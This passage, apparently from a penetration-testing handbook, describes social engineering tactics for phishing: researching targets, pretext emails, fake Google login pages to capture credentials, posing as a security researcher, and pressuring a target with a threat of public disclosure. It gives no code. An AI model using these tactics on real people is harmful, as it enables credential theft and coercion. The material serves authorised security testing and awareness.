The success of every social engineering attack lies on the ability of the attacker to convince the user and the willingness of the user to follow the attacker's instructions. This recipe will be a series of situations and techniques used by attackers to take advantage of to make their cons more believable to a user and catch them.
In this section, we will see some of the attacks that have worked for previous security assessments, on users who were security conscious at a certain level and wouldn't fall to the classic "bank account update" scam.
- Do your homework: If it is a Spear phishing attack, do a thorough research about your target: social networks, forums, blogs, and any source of information that tells you what your target is into. Maltego, which is included in Kali Linux, may be very useful for this task. Then build a pretext (a fake story) or a theme of the attack based on that.
We once found a client's employee, who was posting a lot of images, videos, and texts about angels on her Facebook page. We gathered some of the content from her page and built a PowerPoint presentation, which also included an exploit to gain remote execution in the client's computer and sent that to her by e-mail.
- Create controversy: If the target is an opinion leader in some field, using their own sayings to get their interested in what you have to tell might help.
We were hired to perform a penetration test on a financial corporation and the engagement rules allowed social engineering. Our target was a person who is known in the economic and financial circles; he writes articles in known magazines, gives interviews, appears in economics news, and so on. Our team did some research about him and got an article from an economics magazine's website. That article included his company's (our client) e-mail. We looked for more information about the article and found some comments and quotations about it on other sites, with that we put together an e-mail saying that we had some comments about the article, giving a teaser in the message, and linking to a document in Google Drive with a shortened link to read it.
That shortened link led the user to a fake Google login page which was controlled by us, which allowed us to gain his corporate e-mail and password.
- Say who you are; well, not exactly. If you say "I'm a security researcher and have found something in your system" it could be a great hook for developers and systems administrators.
On another engagement, we had to specifically and socially engineer the systems administrator of a company. First, we didn't find any useful information about him on the Web, but we found some vulnerabilities in one of the company's websites. We used that to send an e-mail to our target saying that we found a few important vulnerabilities in the company's servers and we could help to fix them, attaching an image as evidence and a link to a Google Drive document (another fake login page).
- Insist and push (lightly): Sometimes you won't receive an answer in the first attempt, always analyze the results—did the target click the link, did the target submit fake information, and then make adjustments for a second try?
We didn't receive an answer for the scenario with the sysadmin, nor a visit to the page; so we sent a second e-mail with a "full report" in PDF and said that we will disclose the vulnerabilities in a public site if we didn't receive an answer; and we received it.
- Make yourself credible: Try to adopt the terminology of the people you are impersonating and provide some truthful information: if you are sending a corporate e-mail, use the company's logo, get a free
.tkor.co.nfdomain for your fake site, dedicate some time to design or correctly copy the target site, and so on.A very common technique used by people who are trying to steal credit card data is to send a variation of the "you need to update your information" mail using a partial credit card number followed by asterisk (*) characters.
A legitimate message would say: "The information corresponding to your card: **** **** **** 3241". While crooks will use: "The information corresponding to your card: 4916 **** **** ****", knowing that the first four digits (4916) are standard for Visa credit cards.
Having a person open an e-mail from a total stranger, reading it, clicking on the links it contains, and providing the information requested in the page it opens may be a hard work to do in these days of so many Nigerian prince scams. The key aspect of a successful social engineering attack is to generate the feeling that the attacker is trying to do something good or necessary for the victim, and also create a certain sense of urgency where the user must respond quickly or will lose a valuable opportunity.
Client-side attacks can also be used to escalate privileges on compromised servers. If you get access to a server but don't have much room to move, you may want to start a malicious server in your attacking machine and browse to it in the target; so you can exploit other kinds of vulnerabilities and maybe gain a privileged command execution.
Although a little aged, the book of Kevin Mitnick, The Art of Deception: Controlling the Human Element of Security, is a very good collection of real life social engineering attacks that may give you more ideas about how to get the client-side attacks to reach the users and how to get them to follow the steps to be exploited.
Also, there is a very interesting article about the advance-free scams (like the Nigerian prince one) that go deep into the profiles of the victims and how these kind of scams have caused millions of dollars in losses to their victims, which are, in essence, social engineering attacks: http://www.ultrascan-agi.com/public_html/html/pdf_files/Pre-Release-419_Advance_Fee_Fraud_Statistics_2013-July-10-2014-NOT-FINAL-1.pdf.